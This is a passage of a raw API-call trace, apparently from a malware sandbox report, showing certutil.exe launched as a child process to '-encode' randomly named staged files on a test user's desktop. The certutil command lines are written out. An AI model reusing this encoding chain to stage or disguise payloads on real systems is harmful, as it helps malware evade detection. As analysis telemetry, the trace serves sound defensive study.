FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0280.094] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0280.095] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0280.095] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0280.095] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xece0d8fac8 | out: _Buffer="10.0.15063.447") returned 14 [0280.095] GetACP () returned 0x4e4 [0280.095] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0280.095] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2d32312b450 [0280.095] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2d32312b450, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0280.095] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2d32312e090 [0280.095] _vsnwprintf (in: _Buffer=0x2d32312e090, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xece0d8fb18 | out: _Buffer="10.0.15063.447 retail") returned 21 [0280.095] LocalFree (hMem=0x2d32312b450) returned 0x0 [0280.095] LocalFree (hMem=0x0) returned 0x0 [0280.095] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0280.095] GetACP () returned 0x4e4 [0280.095] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0280.095] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2d32312b9d0 [0280.095] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2d32312b9d0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0280.095] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2d32312dd90 [0280.095] _vsnwprintf (in: _Buffer=0x2d32312dd90, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xece0d8fb18 | out: _Buffer="10.0.15063.447 retail") returned 21 [0280.095] LocalFree (hMem=0x2d32312b9d0) returned 0x0 [0280.095] LocalFree (hMem=0x0) returned 0x0 [0280.096] GetACP () returned 0x4e4 [0280.096] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0280.096] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2d32312b970 [0280.096] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2d32312b970, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0280.096] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2d32312ded0 [0280.096] _vsnwprintf (in: _Buffer=0x2d32312ded0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xece0d8fb48 | out: _Buffer="10.0.15063.447 retail") returned 21 [0280.096] LocalFree (hMem=0x2d32312b970) returned 0x0 [0280.096] LocalFree (hMem=0x2d32312e090) returned 0x0 [0280.096] LocalFree (hMem=0x2d32312dd90) returned 0x0 [0280.096] LocalFree (hMem=0x2d32312ded0) returned 0x0 [0280.096] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0280.096] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0280.096] GetStockObject (i=0) returned 0x900010 [0280.097] RegisterClassW (lpWndClass=0xece0d8fc70) returned 0xc1a2 [0280.097] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2002c8 [0280.190] NtdllDefWindowProc_W () returned 0x0 [0280.190] NtdllDefWindowProc_W () returned 0x1 [0280.207] NtdllDefWindowProc_W () returned 0x0 [0280.215] UpdateWindow (hWnd=0x2002c8) returned 1 [0280.215] PostMessageW (hWnd=0x2002c8, Msg=0x400, wParam=0x0, lParam=0x2d32311217e) returned 1 [0280.216] GetMessageW (in: lpMsg=0xece0d8fcc0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xece0d8fcc0) returned 1 [0280.216] TranslateMessage (lpMsg=0xece0d8fcc0) returned 0 [0280.216] DispatchMessageW (lpMsg=0xece0d8fcc0) returned 0x0 [0280.216] NtdllDefWindowProc_W () returned 0x0 [0280.216] GetMessageW (in: lpMsg=0xece0d8fcc0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xece0d8fcc0) returned 1 [0280.216] TranslateMessage (lpMsg=0xece0d8fcc0) returned 0 [0280.216] DispatchMessageW (lpMsg=0xece0d8fcc0) returned 0x0 [0280.216] LocalAlloc (uFlags=0x0, uBytes=0x5a) returned 0x2d3231184f0 [0280.216] LocalAlloc (uFlags=0x0, uBytes=0x66) returned 0x2d323119320 [0280.216] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0280.216] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0280.216] SetLastError (dwErrCode=0x80070716) [0280.216] _vsnwprintf (in: _Buffer=0xece0d8f6c8, _BufferCount=0xb, _Format="%d", _ArgList=0xece0d8f6b8 | out: _Buffer="465") returned 3 [0280.216] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xece0d8f480, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0280.216] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2d323122360 [0280.217] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0280.217] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0280.217] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xece0d8f460, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0280.217] GetLastError () returned 0xcb [0280.217] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0280.217] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0280.217] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0280.217] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0280.217] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0280.217] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0280.217] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0280.217] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0280.217] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0280.217] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0280.217] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0280.217] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0280.217] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0280.217] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0280.217] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0280.217] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0280.218] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0280.218] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0280.218] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0280.218] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0280.218] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0280.218] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xece0d8f128 | out: phkResult=0xece0d8f128*=0x23c) returned 0x0 [0280.218] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x2d3231159f0 [0280.218] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xece0d8f698, lpData=0xece0d8f6c8, lpcbData=0xece0d8f690*=0x4 | out: lpType=0xece0d8f698*=0x0, lpData=0xece0d8f6c8*=0x0, lpcbData=0xece0d8f690*=0x4) returned 0x2 [0280.218] LocalFree (hMem=0x2d3231159f0) returned 0x0 [0280.218] RegCloseKey (hKey=0x23c) returned 0x0 [0280.218] LocalFree (hMem=0x0) returned 0x0 [0280.218] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x2d32313cf10 [0280.230] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0280.230] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0280.230] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0280.230] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0280.230] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0280.230] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0280.230] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0280.230] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0280.230] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0280.230] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0280.230] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0280.230] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0280.230] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0280.230] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0280.230] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0280.230] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0280.231] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x2d323141aa0 [0280.231] GetComputerNameW (in: lpBuffer=0x2d323141aa0, nSize=0xece0d8f690 | out: lpBuffer="NQDPDE", nSize=0xece0d8f690) returned 1 [0280.231] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xece0d8f660 | out: lpBuffer=0x0, nSize=0xece0d8f660) returned 0 [0280.231] GetLastError () returned 0xea [0280.231] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2d32312b470 [0280.231] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x2d32312b470, nSize=0xece0d8f660 | out: lpBuffer="NQdPdE", nSize=0xece0d8f660) returned 1 [0280.231] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0280.269] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x2d323142050, cbCertEncoded=0x11057) returned 0x0 [0280.272] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x2d323142050, cbCrlEncoded=0x11057) returned 0x0 [0280.274] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x2d323142050, cbEncoded=0x11057, dwFlags=0x8000, pDecodePara=0xece0d8f540, pvStructInfo=0xece0d8f5d0, pcbStructInfo=0xece0d8f5c4 | out: pvStructInfo=0xece0d8f5d0, pcbStructInfo=0xece0d8f5c4) returned 0 [0280.274] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x2d323142050, cbEncoded=0x11057, dwFlags=0x8000, pDecodePara=0xece0d8f540, pvStructInfo=0xece0d8f5d0, pcbStructInfo=0xece0d8f5c4 | out: pvStructInfo=0xece0d8f5d0, pcbStructInfo=0xece0d8f5c4) returned 0 [0280.274] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x2d323142050, cbEncoded=0x11057, dwFlags=0x8000, pDecodePara=0xece0d8f540, pvStructInfo=0xece0d8f5d0, pcbStructInfo=0xece0d8f5c4 | out: pvStructInfo=0xece0d8f5d0, pcbStructInfo=0xece0d8f5c4) returned 0 [0280.275] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x2d32311bdb0 [0280.282] CryptMsgUpdate (hCryptMsg=0x2d32311bdb0, pbData=0x2d323142050, cbData=0x11057, fFinal=1) returned 0 [0280.282] GetLastError () returned 0x8009310b [0280.282] CryptMsgClose (hCryptMsg=0x2d32311bdb0) returned 1 [0280.283] GetFileAttributesExW (in: lpFileName="zfOV4.swf.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\zfov4.swf.sister"), fInfoLevelId=0x0, lpFileInformation=0xece0d8f5f0 | out: lpFileInformation=0xece0d8f5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25deb2e0, ftCreationTime.dwHighDateTime=0x1d5e56f, ftLastAccessTime.dwLowDateTime=0x18f51030, ftLastAccessTime.dwHighDateTime=0x1d5e8a1, ftLastWriteTime.dwLowDateTime=0x18f51030, ftLastWriteTime.dwHighDateTime=0x1d5e8a1, nFileSizeHigh=0x0, nFileSizeLow=0x11057)) returned 1 [0280.283] _vsnwprintf (in: _Buffer=0xece0d8f5f8, _BufferCount=0xb, _Format="%d", _ArgList=0xece0d8f5e8 | out: _Buffer="359") returned 3 [0280.283] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xece0d8f3b0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0280.283] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2d323141ce0 [0280.283] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0280.283] _vsnwprintf (in: _Buffer=0xece0d8e5e0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xece0d8f638 | out: _Buffer="Input Length = 69719") returned 20 [0280.283] GetFileType (hFile=0x50) returned 0x2 [0280.283] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xece0d8e5e0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xece0d8e594, lpReserved=0x0 | out: lpBuffer=0xece0d8e5e0*, lpNumberOfCharsWritten=0xece0d8e594*=0x14) returned 1 [0280.387] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0280.387] _vsnwprintf (in: _Buffer=0xece0d8e5e0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xece0d8f638 | out: _Buffer="\n") returned 1 [0280.387] GetFileType (hFile=0x50) returned 0x2 [0280.387] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xece0d8e5e0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xece0d8e594, lpReserved=0x0 | out: lpBuffer=0xece0d8e5e0*, lpNumberOfCharsWritten=0xece0d8e594*=0x1) returned 1 [0280.567] GetFileAttributesExW (in: lpFileName="zfOV4.swf.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\zfov4.swf.cruel"), fInfoLevelId=0x0, lpFileInformation=0xece0d8f5f0 | out: lpFileInformation=0xece0d8f5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1c7f261, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xd1c7f261, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd1cf0702, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x176b2)) returned 1 [0280.568] _vsnwprintf (in: _Buffer=0xece0d8f5f8, _BufferCount=0xb, _Format="%d", _ArgList=0xece0d8f5e8 | out: _Buffer="361") returned 3 [0280.568] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xece0d8f3b0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0280.568] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x2d323141890 [0280.568] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0280.568] _vsnwprintf (in: _Buffer=0xece0d8e5e0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xece0d8f638 | out: _Buffer="Output Length = 95922") returned 21 [0280.568] GetFileType (hFile=0x50) returned 0x2 [0280.568] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xece0d8e5e0*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0xece0d8e594, lpReserved=0x0 | out: lpBuffer=0xece0d8e5e0*, lpNumberOfCharsWritten=0xece0d8e594*=0x15) returned 1 [0280.671] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0280.671] _vsnwprintf (in: _Buffer=0xece0d8e5e0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xece0d8f638 | out: _Buffer="\n") returned 1 [0280.671] GetFileType (hFile=0x50) returned 0x2 [0280.671] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xece0d8e5e0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xece0d8e594, lpReserved=0x0 | out: lpBuffer=0xece0d8e5e0*, lpNumberOfCharsWritten=0xece0d8e594*=0x1) returned 1 [0280.786] LocalFree (hMem=0x2d323142050) returned 0x0 [0280.788] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0280.788] _vsnwprintf (in: _Buffer=0xece0d8f658, _BufferCount=0xb, _Format="%d", _ArgList=0xece0d8f648 | out: _Buffer="2022") returned 4 [0280.788] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xece0d8f410, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0280.788] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x2d323118b50 [0280.788] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0280.788] _vsnwprintf (in: _Buffer=0xece0d8e640, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xece0d8f698 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0280.788] GetFileType (hFile=0x50) returned 0x2 [0280.788] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xece0d8e640*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xece0d8e5f4, lpReserved=0x0 | out: lpBuffer=0xece0d8e640*, lpNumberOfCharsWritten=0xece0d8e5f4*=0x31) returned 1 [0280.863] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0280.863] _vsnwprintf (in: _Buffer=0xece0d8e640, _BufferCount=0x1ff, _Format="\n", _ArgList=0xece0d8f698 | out: _Buffer="\n") returned 1 [0280.863] GetFileType (hFile=0x50) returned 0x2 [0280.863] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xece0d8e640*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xece0d8e5f4, lpReserved=0x0 | out: lpBuffer=0xece0d8e640*, lpNumberOfCharsWritten=0xece0d8e5f4*=0x1) returned 1 [0280.938] LocalFree (hMem=0x0) returned 0x0 [0280.938] LocalFree (hMem=0x2d323119320) returned 0x0 [0280.938] LocalFree (hMem=0x2d3231184f0) returned 0x0 [0280.938] SetLastError (dwErrCode=0x80070716) [0280.938] _vsnwprintf (in: _Buffer=0xece0d8f6c8, _BufferCount=0xb, _Format="%d", _ArgList=0xece0d8f6b8 | out: _Buffer="511") returned 3 [0280.938] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xece0d8f480, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0280.939] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2d323141fe0 [0280.939] PostQuitMessage (nExitCode=0) [0280.939] GetMessageW (in: lpMsg=0xece0d8fcc0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xece0d8fcc0) returned 0 [0280.939] LocalFree (hMem=0x2d32312b470) returned 0x0 [0280.939] LocalFree (hMem=0x2d323141aa0) returned 0x0 [0280.939] LocalFree (hMem=0x0) returned 0x0 [0280.940] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0280.940] GetLastError () returned 0x7e [0280.940] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0280.940] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0280.940] DllMain () returned 0x1 [0280.940] LocalFree (hMem=0x2d32312b310) returned 0x0 [0280.940] LocalFree (hMem=0x2d323122360) returned 0x0 [0280.941] LocalFree (hMem=0x2d323141ce0) returned 0x0 [0280.941] LocalFree (hMem=0x2d323141890) returned 0x0 [0280.941] LocalFree (hMem=0x2d323118b50) returned 0x0 [0280.941] LocalFree (hMem=0x2d323141fe0) returned 0x0 [0280.941] LocalFree (hMem=0x2d323120990) returned 0x0 [0280.941] LocalFree (hMem=0x2d3231221e0) returned 0x0 [0280.941] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0280.941] GetLastError () returned 0x7e [0280.941] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0280.941] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0280.941] DllMain () returned 0x1 [0280.942] exit (_Code=0) Thread: id = 105 os_tid = 0xd64 Thread: id = 106 os_tid = 0xd10 Process: id = "40" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x22a9e000" os_pid = "0x1360" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"zuXa5tA1VeTtCxZv.gif.Sister\" \"zuXa5tA1VeTtCxZv.gif.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 107 os_tid = 0x1274 [0283.298] GetStartupInfoW (in: lpStartupInfo=0xe4eea7fe40 | out: lpStartupInfo=0xe4eea7fe40*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"zuXa5tA1VeTtCxZv.gif.Sister\" \"zuXa5tA1VeTtCxZv.gif.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0283.298] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0283.299] __set_app_type (_Type=0x1) [0283.299] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0283.299] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0283.302] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0283.302] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0283.302] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0283.303] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0283.303] WerSetFlags () returned 0x0 [0283.303] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0283.303] __iob_func () returned 0x7ffcea2dea00 [0283.303] _fileno (_File=0x7ffcea2dea30) returned 1 [0283.303] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0283.303] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0283.305] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0283.305] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0283.305] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0283.306] GetConsoleOutputCP () returned 0x1b5 [0283.383] _vsnwprintf (in: _Buffer=0xe4eea7fdb0, _BufferCount=0xb, _Format=".%d", _ArgList=0xe4eea7fcd8 | out: _Buffer=".437") returned 4 [0283.383] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0283.383] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0283.383] GetFileType (hFile=0x50) returned 0x2 [0283.383] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0283.384] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0283.384] SetThreadUILanguage (LangId=0x0) returned 0x409 [0283.527] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0283.528] GetCommandLineW () returned="certutil -encode \"zuXa5tA1VeTtCxZv.gif.Sister\" \"zuXa5tA1VeTtCxZv.gif.Cruel\"" [0283.528] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2541d84b8c0 [0283.528] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2541d83ceb0 [0283.528] LocalFree (hMem=0x2541d84b8c0) returned 0x0 [0283.528] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2541d83b960 [0283.528] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x2541d83bba0 [0283.528] LocalFree (hMem=0x2541d83b960) returned 0x0 [0283.528] LocalFree (hMem=0x2541d83ceb0) returned 0x0 [0283.528] LocalFree (hMem=0x0) returned 0x0 [0283.528] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0283.528] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0283.529] GetCommandLineW () returned="certutil -encode \"zuXa5tA1VeTtCxZv.gif.Sister\" \"zuXa5tA1VeTtCxZv.gif.Cruel\"" [0283.529] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2541d84bba0 [0283.529] GetSystemTime (in: lpSystemTime=0xe4eea7faa0 | out: lpSystemTime=0xe4eea7faa0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x3a, 